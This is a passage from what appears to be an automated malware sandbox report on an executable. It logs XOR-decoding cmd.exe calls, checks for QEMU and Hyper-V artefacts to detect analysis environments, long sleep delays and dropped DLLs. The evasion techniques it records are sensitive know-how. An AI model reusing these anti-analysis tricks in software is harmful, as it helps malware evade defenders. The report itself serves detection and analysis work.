              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI/Special instruction interceptor: Address: 19D5524
              Tries to detect Any.run
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
              Source: asXlZG3aW6.exe, 00000000.00000002.21760824422.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269970469.0000000006D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IHJC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000496000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEJE
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,131_2_0040DD85
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeWindow / User API: threadDelayed 9468Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dllJump to dropped file
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI coverage: 4.7 %
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI coverage: 10.0 %
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 5840Thread sleep count: 270 > 30Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 5840Thread sleep time: -135000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424Thread sleep count: 9468 > 30Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe TID: 1424Thread sleep time: -28404000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00406268 FindFirstFileA,FindClose,130_2_00406268
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,130_2_0040572D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_004026F8 LdrInitializeThunk,FindFirstFileA,130_2_004026F8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,130_2_367B10F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B6580 FindFirstFileExA,130_2_367B6580
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040AE51 FindFirstFileW,FindNextFileW,131_2_0040AE51
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,132_2_00407EF8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,133_2_00407898
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00418981 memset,GetSystemInfo,131_2_00418981
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: asXlZG3aW6.exe, 00000000.00000002.21760824422.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269970469.0000000006D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ihJC:\Program Files\Qemu-ga\qemu-ga.exe
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCookies
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: asXlZG3aW6.exe, 00000000.00000002.21773441579.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: asXlZG3aW6.exe, 00000000.00000002.21759600322.0000000000496000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeje
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI call chain: ExitProcess graph end nodegraph_0-4030
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI call chain: ExitProcess graph end nodegraph_0-4219
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeAPI call chain: ExitProcess graph end nodegraph_132-34113
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00402D48 GetTempPathA,GetTickCount,GetModuleFileNameA,LdrInitializeThunk,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,SetFilePointer,130_2_00402D48
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,130_2_367B2639
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,131_2_0040DD85
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B4AB4 mov eax, dword ptr fs:[00000030h]130_2_367B4AB4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B724E GetProcessHeap,130_2_367B724E
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,130_2_367B2639
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,130_2_367B2B1C
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,130_2_367B60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
